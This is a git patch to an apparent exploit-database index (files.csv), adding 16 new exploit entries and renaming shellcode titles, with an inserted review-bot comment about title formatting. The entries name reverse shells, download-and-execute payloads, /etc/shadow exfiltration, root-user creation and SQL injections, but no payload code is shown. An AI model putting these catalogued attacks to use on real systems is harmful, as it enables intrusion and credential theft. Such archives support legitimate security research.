From e4f4ca48ad74a3d7e523c63e7a31f93a6372af53 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Tue, 22 Aug 2017 05:01:20 +0000 Subject: [PATCH] DB: 2017-08-22 16 new exploits Easy DVD Creater 2.5.11 - Buffer Overflow (SEH) FreeBSD/x86 - Bind 4883/TCP with Auth Shellcode (222 bytes) FreeBSD/x86 - Bind TCP Password Shell (4883/TCP) Shellcode (222 bytes) Cisco IOS - Bind Password Shellcode (116 bytes) Cisco IOS - New TTY_ Privilege level to 15_ No password Shellcode Cisco IOS/PowerPC - Bind Password (1rmp455) Shellcode (116 bytes) Cisco IOS - New TTY / Privilege Level To 15 / No Password Shellcode Linux/x86-64 - Connect Back Semi-Stealth Shellcode (88+ bytes) Linux/x86-64 - Reverse TCP Semi-Stealth Shell Shellcode (88+ bytes) (Generator) Linux/SPARC - connect back (192.168.100.1:2313) Shellcode (216 bytes) Linux/SPARC - Reverse TCP Shell (192.168.100.1:2313/TCP) Shellcode (216 bytes) Linux/x86 - Connectback 54321/UDP Live Packet Capture Shellcode (151 bytes) Linux/x86 - Reverse UDP tcpdump (54321/UDP) Live Packet Capture Shellcode (151 bytes) Linux/x86 - Connect back (140.115.53.35:9999) + Download a file (cb) + Execute Shellcode (149 bytes) Linux/x86 - ConnectBack (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes) Linux/x86 - Connectback Port 8192.send.exit /etc/shadow Shellcode (155 bytes) Linux/x86 - Writes A PHP connectback shell (/var/www/cb.php) To The Filesystem Shellcode (508 bytes) Linux/x86 - Reverse TCP /etc/shadow (8192/TCP) Shellcode (155 bytes) Linux/x86 - Reverse PHP (Writes to /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes) Linux/x86 - SET_IP() Connectback (192.168.13.22:31337) Shellcode (82 bytes) Linux/x86 - Reverse TCP Shell (192.168.13.22:31337) Shellcode (82 bytes) (Generator) Linux/x86 - Connectback (127.0.0.1:80) (XOR Encoded) Shellcode (371 bytes) Linux/x86 - Reverse TCP XOR Encoded Shell (127.0.0.1:80/TCP) Shellcode (371 bytes) Linux/x86 - Bind Password 64713/TCP Shellcode (166 bytes) Linux/x86 - Bind TCP Password (gotfault) Shell (64713/TCP) Shellcode (166 
bytes) Linux/x86 - Connectback 127.0.0.1:31337/TCP Shellcode (74 bytes) Linux/x86 - Reverse TCP Shell (127.0.0.1:31337/TCP) Shellcode (74 bytes) Linux/x86 - Connectback Shellcode (90 bytes) Linux/x86 - Reverse TCP Shell Shellcode (90 bytes) (Generator) Solaris/SPARC - connect-back (with XNOR encoded session) Shellcode (600 bytes) Solaris/SPARC - Reverse TCP XNOR Encoded Shell (44434/TCP) Shellcode (600 bytes) (Generator) Solaris/SPARC - connect-back Shellcode (204 bytes) Solaris/SPARC - Reverse TCP Shell (192.168.1.4:5678/TCP) Shellcode (204 bytes) Win32 - Connectback + receive + save + execute Shellcode Win32 - ConnectBack + Download A File + Save + Execute Shellcode Windows XP/2000/2003 - Overflow Connect Back Shellcode (275 bytes) Windows XP/2000/2003 - Reverse TCP Shell (127.0.0.1:53) Shellcode (275 bytes) (Generator) Linux/x86 - Netcat Connectback 8080/TCP Shellcode (76 bytes) Linux/x86 - Reverse Netcat Shell (8080/TCP) Shellcode (76 bytes) Linux/ARM - Add root user 'shell-storm' with password 'toor' Shellcode (151 bytes) Linux/ARM - Add Root User (shell-storm/toor) Shellcode (151 bytes) Linux/x86 - ConnectBack with SSL connection Shellcode (422 bytes) Linux/SuperH (sh4) - Add root user 'shell-storm' with password 'toor' Shellcode (143 bytes) Linux/x86 - Reverse TCP SSL Shell (localhost:8080) Shellcode (422 bytes) Linux/SuperH (sh4) - Add Root User (shell-storm/toor) Shellcode (143 bytes) Linux/MIPS - Add user(UID 0) 'rOOt' with password 'pwn3d' Shellcode (164 bytes) Linux/MIPS - Add User(UID 0) (rOOt/'pwn3d) Shellcode (164 bytes) Linux/x86-64 - Connect Back Shellcode (139 bytes) Linux/x86-64 - Reverse TCP Shell (127.1.1.1:6969/TCP) Shellcode (139 bytes) Linux/x86-64 - Bind TCP Password Shell (4444/TCP) Shellcode (81/96 bytes with password) Linux/x86-64 - Reverse TCP Connect Shellcode (77-85/90-98 bytes with Password) Linux/x86-64 - Bind TCP Password (Z~r0) Shell (4444/TCP) Shellcode (81/96 bytes) Linux/x86-64 - Reverse TCP Password (Z~r0) Shell 
(127.0.0.1:4444/TCP) Shellcode (77-85/90-98 bytes) Linux/x86-64 - Bind 31173/TCP Password Shellcode (92 bytes) Linux/x86-64 - Bind TCP Password (1234) Shell (31173/TCP) Shellcode (92 bytes) Linux/x86-64 - Bind 4444/TCP Password Shellcode (162 bytes) Linux/x86-64 - Bind TCP Password (hack) Shell (4444/TCP) Shellcode (162 bytes) Linux/x86-64 - Reverse TCP Password (hack) Polymorphic Shell (127.0.0.1:4444/TCP) Shellcode (1) (122 bytes) Linux/x86-64 - Reverse TCP Password (hack) Polymorphic Shell (127.0.0.1:4444/TCP) Shellcode (122 bytes) Linux/x86-64 - Ncat Shellcode (SSL_ MultiChannel_ Persistant_ Fork_ IPv4/6_ Password) (176 bytes) Linux/x86-64 - Bind Ncat (4442/TCP) Shell / SSL / Multi-Channel (4444/TCP-4447/TCP) / Persistant / Fork / IPv4/6 / Password Shellcode (176 bytes) Linux/x86-64 - Bind Shell / Syscall Persistent / Multi-terminal / Password / Daemon Shellcode (83/148/177 bytes) Linux/x86-64 - Bind TCP (4442/TCP) Shell / Syscall Persistent / Multi-Terminal (4444/TCP-4447/TCP) / Password (la crips) / Daemon Shellcode (83/148/177 bytes) Windows x64 - Bind Password (h271508F) 2493/TCP Shellcode (825 bytes) Windows x64 - Bind TCP Password (h271508F) Shell (2493/TCP) Shellcode (825 bytes) Linux/x86_64 - kill All Processes Shellcode (19 bytes) Linux/x86_64 - Fork Bomb Shellcode (11 bytes) Apache2Triad 1.5.4 - Multiple Vulnerabilities Joomla! Component Flip Wall 8.0 - 'wallid' Parameter SQL Injection Joomla! Component Sponsor Wall 8.0 - SQL Injection PHP Classifieds Script 5.6.2 - SQL Injection Affiliate Niche Script 3.4.0 - SQL Injection PHP Coupon Script 6.0 - 'cid' Parameter SQL Injection iTech Social Networking Script 3.08 - SQL Injection Joomla! Component FocalPoint 1.2.3 - SQL Injection Php Cloud mining Script - Authentication Bypass Joomla! 
Component Ajax Quiz 1.8 - SQL Injection PHP-Lance 1.52 - 'subcat' Parameter SQL Injection PHP Jokesite 2.0 - 'joke_id' Parameter SQL Injection PHPMyWind 5.3 - Cross-Site Scripting
---
 files.csv | 80 ++++++----
 platforms/lin_x86-64/shellcode/42522.c | 63 ++++++++
 platforms/lin_x86-64/shellcode/42523.c | 61 ++++++++
 platforms/php/webapps/42520.txt | 208 +++++++++++++++++++++++++
 platforms/php/webapps/42524.txt | 27 ++++
 platforms/php/webapps/42525.txt | 27 ++++
 platforms/php/webapps/42526.txt | 27 ++++
 platforms/php/webapps/42527.txt | 27 ++++
 platforms/php/webapps/42528.txt | 27 ++++
 platforms/php/webapps/42529.txt | 29 ++++
 platforms/php/webapps/42530.txt | 26 ++++
 platforms/php/webapps/42531.txt | 27 ++++
 platforms/php/webapps/42532.txt | 27 ++++
 platforms/php/webapps/42533.txt | 27 ++++
 platforms/php/webapps/42534.txt | 27 ++++
 platforms/php/webapps/42535.txt | 68 ++++++++
 platforms/windows/local/42521.py | 60 +++++++
 17 files changed, 806 insertions(+), 32 deletions(-)
 create mode 100755 platforms/lin_x86-64/shellcode/42522.c
 create mode 100755 platforms/lin_x86-64/shellcode/42523.c
 create mode 100755 platforms/php/webapps/42520.txt
 create mode 100755 platforms/php/webapps/42524.txt
 create mode 100755 platforms/php/webapps/42525.txt
 create mode 100755 platforms/php/webapps/42526.txt
 create mode 100755 platforms/php/webapps/42527.txt
 create mode 100755 platforms/php/webapps/42528.txt
 create mode 100755 platforms/php/webapps/42529.txt
 create mode 100755 platforms/php/webapps/42530.txt
 create mode 100755 platforms/php/webapps/42531.txt
 create mode 100755 platforms/php/webapps/42532.txt
 create mode 100755 platforms/php/webapps/42533.txt
 create mode 100755 platforms/php/webapps/42534.txt
 create mode 100755 platforms/php/webapps/42535.txt
 create mode 100755 platforms/windows/local/42521.py
diff --git a/files.csv b/files.csv
index fb98297ec..db63f4b47 100644
--- a/files.csv
+++ b/files.csv
@@ -9206,6 +9206,7 @@ id,file,description,date,author,platform,type,port
 42454,platforms/macos/local/42454.txt,"Xamarin Studio for Mac 6.2.1 (build 3) / 6.3 (build 863) - Privilege Escalation",2017-08-14,Securify,macos,local,0
 42455,platforms/windows/local/42455.py,"ALLPlayer 7.4 - Buffer Overflow (SEH Unicode)",2017-08-15,f3ci,windows,local,0
 42456,platforms/windows/local/42456.py,"Internet Download Manager 6.28 Build 17 - Buffer Overflow (SEH Unicode)",2017-08-15,f3ci,windows,local,0
+42521,platforms/windows/local/42521.py,"Easy DVD Creater 2.5.11 - Buffer Overflow (SEH)",2017-08-19,"Anurag Srivastava",windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -15790,7 +15791,7 @@ id,file,description,date,author,platform,type,port
 13267,platforms/freebsd_x86/shellcode/13267.asm,"FreeBSD/x86 - Reverse /bin/sh Shell (127.0.0.1:8000) Shellcode (89 bytes)",2008-08-21,sm4x,freebsd_x86,shellcode,0
 13268,platforms/freebsd_x86/shellcode/13268.asm,"FreeBSD/x86 - setuid(0); execve(ipf -Fa); Shellcode (57 bytes)",2008-08-21,sm4x,freebsd_x86,shellcode,0
 13269,platforms/freebsd_x86/shellcode/13269.c,"FreeBSD/x86 - /bin/sh Encrypted Shellcode (48 bytes)",2008-08-19,c0d3_z3r0,freebsd_x86,shellcode,0
-13270,platforms/freebsd_x86/shellcode/13270.c,"FreeBSD/x86 - Bind 4883/TCP with Auth Shellcode (222 bytes)",2006-07-19,MahDelin,freebsd_x86,shellcode,0
+13270,platforms/freebsd_x86/shellcode/13270.c,"FreeBSD/x86 - Bind TCP Password Shell (4883/TCP) Shellcode (222 bytes)",2006-07-19,MahDelin,freebsd_x86,shellcode,0
 13271,platforms/freebsd_x86/shellcode/13271.c,"FreeBSD/x86 - reboot(RB_AUTOBOOT) Shellcode (7 bytes)",2006-04-19,IZ,freebsd_x86,shellcode,0
 13272,platforms/freebsd_x86/shellcode/13272.c,"FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes)",2006-04-14,IZ,freebsd_x86,shellcode,0
 13273,platforms/freebsd_x86/shellcode/13273.c,"FreeBSD/x86 - execve /bin/sh Shellcode (2) (23 bytes)",2004-09-26,marcetam,freebsd_x86,shellcode,0
@@ -15811,11 +15812,11 @@ id,file,description,date,author,platform,type,port
 13289,platforms/generator/shellcode/13289.c,"Win32 - Multi-Format Encoding Tool Shellcode (Generator)",2005-12-16,Skylined,generator,shellcode,0
 13290,platforms/ios/shellcode/13290.txt,"iOS - Version-independent Shellcode",2008-08-21,"Andy Davis",ios,shellcode,0
 13291,platforms/hardware/shellcode/13291.txt,"Cisco IOS - Connectback 21/TCP Shellcode",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0
-13292,platforms/hardware/shellcode/13292.txt,"Cisco IOS - Bind Password Shellcode (116 bytes)",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0
-13293,platforms/hardware/shellcode/13293.txt,"Cisco IOS - New TTY_ Privilege level to 15_ No password Shellcode",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0
+13292,platforms/hardware/shellcode/13292.txt,"Cisco IOS/PowerPC - Bind Password (1rmp455) Shellcode (116 bytes)",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0
+13293,platforms/hardware/shellcode/13293.txt,"Cisco IOS - New TTY / Privilege Level To 15 / No Password Shellcode",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0
 13295,platforms/hp-ux/shellcode/13295.txt,"HPUX - execve /bin/sh Shellcode (58 bytes)",2004-09-26,K2,hp-ux,shellcode,0
 13296,platforms/lin_x86-64/shellcode/13296.c,"Linux/x86-64 - Flush IPTables Rules Shellcode (84 bytes)",2008-11-28,gat3way,lin_x86-64,shellcode,0
-13297,platforms/lin_x86-64/shellcode/13297.c,"Linux/x86-64 - Connect Back Semi-Stealth Shellcode (88+ bytes)",2006-04-21,phar,lin_x86-64,shellcode,0
+13297,platforms/lin_x86-64/shellcode/13297.c,"Linux/x86-64 - Reverse TCP Semi-Stealth Shell Shellcode (88+ bytes) (Generator)",2006-04-21,phar,lin_x86-64,shellcode,0
 13298,platforms/linux_mips/shellcode/13298.c,"Linux/MIPS (Linksys WRT54G/GL) - Bind 4919/TCP Shellcode (276 bytes)",2008-08-18,vaicebine,linux_mips,shellcode,0
 13299,platforms/linux_mips/shellcode/13299.c,"Linux/MIPS (Linksys WRT54G/GL) - execve Shellcode (60 bytes)",2008-08-18,vaicebine,linux_mips,shellcode,0
 13300,platforms/linux_mips/shellcode/13300.c,"Linux/MIPS - execve /bin/sh Shellcode (56 bytes)",2005-11-09,"Charles Stevenson",linux_mips,shellcode,0
@@ -15823,7 +15824,7 @@ id,file,description,date,author,platform,type,port
 13302,platforms/linux_ppc/shellcode/13302.c,"Linux/PPC - read + exec Shellcode (32 bytes)",2005-11-09,"Charles Stevenson",linux_ppc,shellcode,0
 13303,platforms/linux_ppc/shellcode/13303.c,"Linux/PPC - connect back (192.168.1.1:31337) execve /bin/sh Shellcode (240 bytes)",2005-11-09,"Charles Stevenson",linux_ppc,shellcode,0
 13304,platforms/linux_ppc/shellcode/13304.c,"Linux/PPC - execve /bin/sh Shellcode (112 bytes)",2004-09-12,Palante,linux_ppc,shellcode,0
-13305,platforms/linux_sparc/shellcode/13305.c,"Linux/SPARC - connect back (192.168.100.1:2313) Shellcode (216 bytes)",2004-09-26,killah,linux_sparc,shellcode,0
+13305,platforms/linux_sparc/shellcode/13305.c,"Linux/SPARC - Reverse TCP Shell (192.168.100.1:2313/TCP) Shellcode (216 bytes)",2004-09-26,killah,linux_sparc,shellcode,0
 13306,platforms/linux_sparc/shellcode/13306.c,"Linux/SPARC - Bind 8975/TCP Shellcode (284 bytes)",2004-09-12,killah,linux_sparc,shellcode,0
 13307,platforms/lin_x86/shellcode/13307.c,"Linux/x86 - Self-Modifying Anti-IDS Shellcode (64 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0
 13308,platforms/lin_x86/shellcode/13308.c,"Linux/x86 - Forks a HTTP Server on 8800/TCP Shellcode (166 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0
@@ -15847,7 +15848,7 @@ id,file,description,date,author,platform,type,port
 13326,platforms/lin_x86/shellcode/13326.c,"Linux/x86 - killall5 Shellcode (34 bytes)",2009-02-04,"Jonathan Salwan",lin_x86,shellcode,0
 13327,platforms/lin_x86/shellcode/13327.c,"Linux/x86 - PUSH reboot() Shellcode (30 bytes)",2009-01-16,"Jonathan Salwan",lin_x86,shellcode,0
 13328,platforms/generator/shellcode/13328.c,"Linux/x86 - Shellcode Obfuscator (Generator)",2008-12-09,sm4x,generator,shellcode,0
-13329,platforms/lin_x86/shellcode/13329.c,"Linux/x86 - Connectback 54321/UDP Live Packet Capture Shellcode (151 bytes)",2008-11-23,XenoMuta,lin_x86,shellcode,0
+13329,platforms/lin_x86/shellcode/13329.c,"Linux/x86 - Reverse UDP tcpdump (54321/UDP) Live Packet Capture Shellcode (151 bytes)",2008-11-23,XenoMuta,lin_x86,shellcode,0
 13330,platforms/lin_x86/shellcode/13330.c,"Linux/x86 - Append RSA key to /root/.ssh/authorized_keys2 Shellcode (295 bytes)",2008-11-23,XenoMuta,lin_x86,shellcode,0
 13331,platforms/lin_x86/shellcode/13331.c,"Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) for full access Shellcode (86 bytes)",2008-11-19,Rick,lin_x86,shellcode,0
 13332,platforms/lin_x86/shellcode/13332.c,"Linux/x86 - Ho' Detector - Promiscuous mode detector Shellcode (56 bytes)",2008-11-18,XenoMuta,lin_x86,shellcode,0
@@ -15855,10 +15856,10 @@ id,file,description,date,author,platform,type,port
 13334,platforms/lin_x86/shellcode/13334.txt,"Linux/x86 - setresuid(0_0_0) /bin/sh Shellcode (35 bytes)",2008-09-29,sorrow,lin_x86,shellcode,0
 13335,platforms/lin_x86/shellcode/13335.c,"Linux/x86 - iopl(3); asm(cli); while(1){} Shellcode (12 bytes)",2008-09-17,dun,lin_x86,shellcode,0
 13336,platforms/lin_x86/shellcode/13336.c,"Linux/x86 - system-beep Shellcode (45 bytes)",2008-09-09,"Thomas Rinsma",lin_x86,shellcode,0
-13337,platforms/lin_x86/shellcode/13337.c,"Linux/x86 - Connect back (140.115.53.35:9999) + Download a file (cb) + Execute Shellcode (149 bytes)",2008-08-25,militan,lin_x86,shellcode,0
+13337,platforms/lin_x86/shellcode/13337.c,"Linux/x86 - ConnectBack (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes)",2008-08-25,militan,lin_x86,shellcode,0
 13338,platforms/lin_x86/shellcode/13338.c,"Linux/x86 - setreuid(geteuid_ geteuid) + execve(/bin/sh) Shellcode (39 bytes)",2008-08-19,Reth,lin_x86,shellcode,0
-13339,platforms/lin_x86/shellcode/13339.asm,"Linux/x86 - Connectback Port 8192.send.exit /etc/shadow Shellcode (155 bytes)",2008-08-18,0in,lin_x86,shellcode,0
-13340,platforms/lin_x86/shellcode/13340.c,"Linux/x86 - Writes A PHP connectback shell (/var/www/cb.php) To The Filesystem Shellcode (508 bytes)",2008-08-18,GS2008,lin_x86,shellcode,0
+13339,platforms/lin_x86/shellcode/13339.asm,"Linux/x86 - Reverse TCP /etc/shadow (8192/TCP) Shellcode (155 bytes)",2008-08-18,0in,lin_x86,shellcode,0
+13340,platforms/lin_x86/shellcode/13340.c,"Linux/x86 - Reverse PHP (Writes to /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes)",2008-08-18,GS2008,lin_x86,shellcode,0
 13341,platforms/lin_x86/shellcode/13341.c,"Linux/x86 - rm -rf / Attempts To Block The Process From Being Stopped Shellcode (132 bytes)",2008-08-18,onionring,lin_x86,shellcode,0
 13342,platforms/lin_x86/shellcode/13342.c,"Linux/x86 - setuid(0) . setgid(0) . aslr_off Shellcode (79 bytes)",2008-08-18,LiquidWorm,lin_x86,shellcode,0
 13343,platforms/lin_x86/shellcode/13343.asm,"Linux/x86 - raw-socket ICMP/checksum shell Shellcode (235 bytes)",2007-04-02,mu-b,lin_x86,shellcode,0
@@ -15882,16 +15883,16 @@ id,file,description,date,author,platform,type,port
 13361,platforms/lin_x86/shellcode/13361.c,"Linux/x86 - Bind 2707/TCP Shellcode (84 bytes)",2006-07-04,oveRet,lin_x86,shellcode,0
 13362,platforms/lin_x86/shellcode/13362.c,"Linux/x86 - execve() Diassembly Obfuscation Shellcode (32 bytes)",2006-05-14,BaCkSpAcE,lin_x86,shellcode,0
 13363,platforms/lin_x86/shellcode/13363.c,"Linux/x86 - Bind 31337/TCP SET_PORT() Shellcode (100 bytes)",2006-05-08,"Benjamin Orozco",lin_x86,shellcode,0
-13364,platforms/lin_x86/shellcode/13364.c,"Linux/x86 - SET_IP() Connectback (192.168.13.22:31337) Shellcode (82 bytes)",2006-05-08,"Benjamin Orozco",lin_x86,shellcode,0
+13364,platforms/lin_x86/shellcode/13364.c,"Linux/x86 - Reverse TCP Shell (192.168.13.22:31337) Shellcode (82 bytes) (Generator)",2006-05-08,"Benjamin Orozco",lin_x86,shellcode,0
 13365,platforms/lin_x86/shellcode/13365.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes)",2006-05-01,hophet,lin_x86,shellcode,0
-13366,platforms/lin_x86/shellcode/13366.txt,"Linux/x86 - Connectback (127.0.0.1:80) (XOR Encoded) Shellcode (371 bytes)",2006-04-18,xort,lin_x86,shellcode,0
+13366,platforms/lin_x86/shellcode/13366.txt,"Linux/x86 - Reverse TCP XOR Encoded Shell (127.0.0.1:80/TCP) Shellcode (371 bytes)",2006-04-18,xort,lin_x86,shellcode,0
 13367,platforms/lin_x86/shellcode/13367.c,"Linux/x86 - execve(/bin/sh) + .ZIP Header Shellcode (28 bytes)",2006-04-17,izik,lin_x86,shellcode,0
 13368,platforms/lin_x86/shellcode/13368.c,"Linux/x86 - execve(/bin/sh) + .RTF Header Shellcode (30 bytes)",2006-04-17,izik,lin_x86,shellcode,0
 13369,platforms/lin_x86/shellcode/13369.c,"Linux/x86 - execve(/bin/sh) + .RIFF Header Shellcode (28 bytes)",2006-04-17,izik,lin_x86,shellcode,0
 13370,platforms/lin_x86/shellcode/13370.c,"Linux/x86 - execve(/bin/sh) + .BMP Bitmap Header Shellcode (27 bytes)",2006-04-17,izik,lin_x86,shellcode,0
 13371,platforms/lin_x86/shellcode/13371.c,"Linux/x86 - /tmp/swr to SWAP restore Shellcode (109 bytes)",2006-04-16,"Gotfault Security",lin_x86,shellcode,0
 13372,platforms/lin_x86/shellcode/13372.c,"Linux/x86 - SWAP store from /tmp/sws Shellcode (99 bytes)",2006-04-16,"Gotfault Security",lin_x86,shellcode,0
-13373,platforms/lin_x86/shellcode/13373.c,"Linux/x86 - Bind Password 64713/TCP Shellcode (166 bytes)",2006-04-06,"Gotfault Security",lin_x86,shellcode,0
+13373,platforms/lin_x86/shellcode/13373.c,"Linux/x86 - Bind TCP Password (gotfault) Shell (64713/TCP) Shellcode (166 bytes)",2006-04-06,"Gotfault Security",lin_x86,shellcode,0
 13374,platforms/lin_x86/shellcode/13374.c,"Linux/x86 - Bind 64713/TCP Shellcode (86 bytes)",2006-04-06,"Gotfault Security",lin_x86,shellcode,0
 13375,platforms/lin_x86/shellcode/13375.c,"Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (25 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0
 13376,platforms/lin_x86/shellcode/13376.c,"Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (23 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0
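Review bot: The new description for 13364 gives the endpoint as `(192.168.13.22:31337)` without the `/TCP` suffix that the other reverse-shell entries renamed in this commit carry (13305, 13337, 13366, 13393, 13496, 34667, 35587 all use `host:port/TCP`); `(192.168.13.22:31337/TCP)` would match them. The same omission appears in later hunks for 13528 (`(127.0.0.1:53)`) and 17371 (`(localhost:8080)`). Since this commit's purpose appears to be normalising these titles, the three outliers are probably worth aligning in the same pass.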
@@ -15911,7 +15912,7 @@ id,file,description,date,author,platform,type,port
 13390,platforms/lin_x86/shellcode/13390.c,"Linux/x86 - eject cd-rom (follows /dev/cdrom symlink) + exit() Shellcode (40 bytes)",2006-01-21,izik,lin_x86,shellcode,0
 13391,platforms/lin_x86/shellcode/13391.c,"Linux/x86 - eject/close cd-rom loop (follows /dev/cdrom symlink) Shellcode (45 bytes)",2006-01-21,izik,lin_x86,shellcode,0
 13392,platforms/lin_x86/shellcode/13392.c,"Linux/x86 - chmod(/etc/shadow_ 0666) + exit() Shellcode (32 bytes)",2006-01-21,izik,lin_x86,shellcode,0
-13393,platforms/lin_x86/shellcode/13393.c,"Linux/x86 - Connectback 127.0.0.1:31337/TCP Shellcode (74 bytes)",2006-01-21,izik,lin_x86,shellcode,0
+13393,platforms/lin_x86/shellcode/13393.c,"Linux/x86 - Reverse TCP Shell (127.0.0.1:31337/TCP) Shellcode (74 bytes)",2006-01-21,izik,lin_x86,shellcode,0
 13394,platforms/lin_x86/shellcode/13394.c,"Linux/x86 - normal exit with random (so to speak) return value Shellcode (5 bytes)",2006-01-21,izik,lin_x86,shellcode,0
 13395,platforms/lin_x86/shellcode/13395.c,"Linux/x86 - getppid() + execve(/proc/pid/exe) Shellcode (51 bytes)",2006-01-21,izik,lin_x86,shellcode,0
 13396,platforms/lin_x86/shellcode/13396.c,"Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) exit Shellcode (4 bytes)",2006-01-21,izik,lin_x86,shellcode,0
@@ -15919,7 +15920,7 @@ id,file,description,date,author,platform,type,port
 13398,platforms/lin_x86/shellcode/13398.c,"Linux/x86 - setreuid(0_ 0) + execve(/bin/sh) Shellcode (31 bytes)",2006-01-21,izik,lin_x86,shellcode,0
 13399,platforms/lin_x86/shellcode/13399.c,"Linux/x86 - execve(/bin/sh) + PUSH Shellcode (23 bytes)",2006-01-21,izik,lin_x86,shellcode,0
 13400,platforms/lin_x86/shellcode/13400.c,"Linux/x86 - cat /dev/urandom > /dev/console Shellcode (63 bytes)",2006-01-21,izik,lin_x86,shellcode,0
-13401,platforms/lin_x86/shellcode/13401.c,"Linux/x86 - Connectback Shellcode (90 bytes)",2005-12-28,xort,lin_x86,shellcode,0
+13401,platforms/lin_x86/shellcode/13401.c,"Linux/x86 - Reverse TCP Shell Shellcode (90 bytes) (Generator)",2005-12-28,xort,lin_x86,shellcode,0
 13402,platforms/lin_x86/shellcode/13402.c,"Linux/x86 - Socket-proxy Shellcode (372 bytes)",2005-12-28,xort,lin_x86,shellcode,0
 13403,platforms/lin_x86/shellcode/13403.c,"Linux/x86 - dup2(0_0); dup2(0_1); dup2(0_2); Shellcode (15 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0
 13404,platforms/lin_x86/shellcode/13404.c,"Linux/x86 - if(read(fd_buf_512)<=2) _exit(1) else buf(); Shellcode (29 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0
@@ -16009,12 +16010,12 @@ id,file,description,date,author,platform,type,port
 13488,platforms/sco_x86/shellcode/13488.c,"SCO/x86 - execve(_/bin/sh__ ..._ NULL); Shellcode (43 bytes)",2005-11-30,"p. minervini",sco_x86,shellcode,0
 13489,platforms/solaris_sparc/shellcode/13489.c,"Solaris/SPARC - Download File + Execute Shellcode (278 bytes)",2006-11-21,xort,solaris_sparc,shellcode,0
 13490,platforms/solaris_sparc/shellcode/13490.c,"Solaris/SPARC - executes command after setreuid Shellcode (92+ bytes)",2006-10-21,bunker,solaris_sparc,shellcode,0
-13491,platforms/solaris_sparc/shellcode/13491.c,"Solaris/SPARC - connect-back (with XNOR encoded session) Shellcode (600 bytes)",2006-07-21,xort,solaris_sparc,shellcode,0
+13491,platforms/solaris_sparc/shellcode/13491.c,"Solaris/SPARC - Reverse TCP XNOR Encoded Shell (44434/TCP) Shellcode (600 bytes) (Generator)",2006-07-21,xort,solaris_sparc,shellcode,0
 13492,platforms/solaris_sparc/shellcode/13492.c,"Solaris/SPARC - setreuid/execve Shellcode (56 bytes)",2005-11-20,lhall,solaris_sparc,shellcode,0
 13493,platforms/solaris_sparc/shellcode/13493.c,"Solaris/SPARC - Bind 6666/TCP Shellcode (240 bytes)",2005-11-20,lhall,solaris_sparc,shellcode,0
 13494,platforms/solaris_sparc/shellcode/13494.txt,"Solaris/SPARC - execve /bin/sh Shellcode (52 bytes)",2004-09-26,LSD-PLaNET,solaris_sparc,shellcode,0
 13495,platforms/solaris_sparc/shellcode/13495.c,"Solaris/SPARC - Bind 6789/TCP Shellcode (228 bytes)",2004-09-26,"Claes Nyberg",solaris_sparc,shellcode,0
-13496,platforms/solaris_sparc/shellcode/13496.c,"Solaris/SPARC - connect-back Shellcode (204 bytes)",2004-09-26,"Claes Nyberg",solaris_sparc,shellcode,0
+13496,platforms/solaris_sparc/shellcode/13496.c,"Solaris/SPARC - Reverse TCP Shell (192.168.1.4:5678/TCP) Shellcode (204 bytes)",2004-09-26,"Claes Nyberg",solaris_sparc,shellcode,0
 13497,platforms/solaris_sparc/shellcode/13497.txt,"Solaris/SPARC - Bind Shellcode (240 bytes)",2000-11-19,dopesquad.net,solaris_sparc,shellcode,0
 13498,platforms/solaris_x86/shellcode/13498.php,"Solaris/x86 - Bind TCP Shellcode (Generator)",2009-06-16,"Jonathan Salwan",solaris_x86,shellcode,0
 13499,platforms/solaris_x86/shellcode/13499.c,"Solaris/x86 - setuid(0) + execve(//bin/sh); + exit(0) Null-Free Shellcode (39 bytes)",2008-12-02,sm4x,solaris_x86,shellcode,0
@@ -16031,7 +16032,7 @@ id,file,description,date,author,platform,type,port
 13511,platforms/win_x86/shellcode/13511.c,"Win32/XP SP2 - cmd.exe Shellcode (57 bytes)",2009-02-03,Stack,win_x86,shellcode,0
 13512,platforms/win_x86/shellcode/13512.c,"Win32 - PEB 'Kernel32.dll' ImageBase Finder Alphanumeric Shellcode (67 bytes)",2008-09-03,Koshi,win_x86,shellcode,0
 13513,platforms/win_x86/shellcode/13513.c,"Win32 - PEB 'Kernel32.dll' ImageBase Finder (ASCII Printable) Shellcode (49 bytes)",2008-09-03,Koshi,win_x86,shellcode,0
-13514,platforms/win_x86/shellcode/13514.asm,"Win32 - Connectback + receive + save + execute Shellcode",2008-08-25,loco,win_x86,shellcode,0
+13514,platforms/win_x86/shellcode/13514.asm,"Win32 - ConnectBack + Download A File + Save + Execute Shellcode",2008-08-25,loco,win_x86,shellcode,0
 13515,platforms/generator/shellcode/13515.pl,"Win32 - Download File + Execute Shellcode (Browsers Edition) (Generator) (275+ bytes)",2008-03-14,"YAG KOHHA",generator,shellcode,0
 13516,platforms/win_x86/shellcode/13516.asm,"Win32 - Download File + Execute Shellcode (192 bytes)",2007-06-27,czy,win_x86,shellcode,0
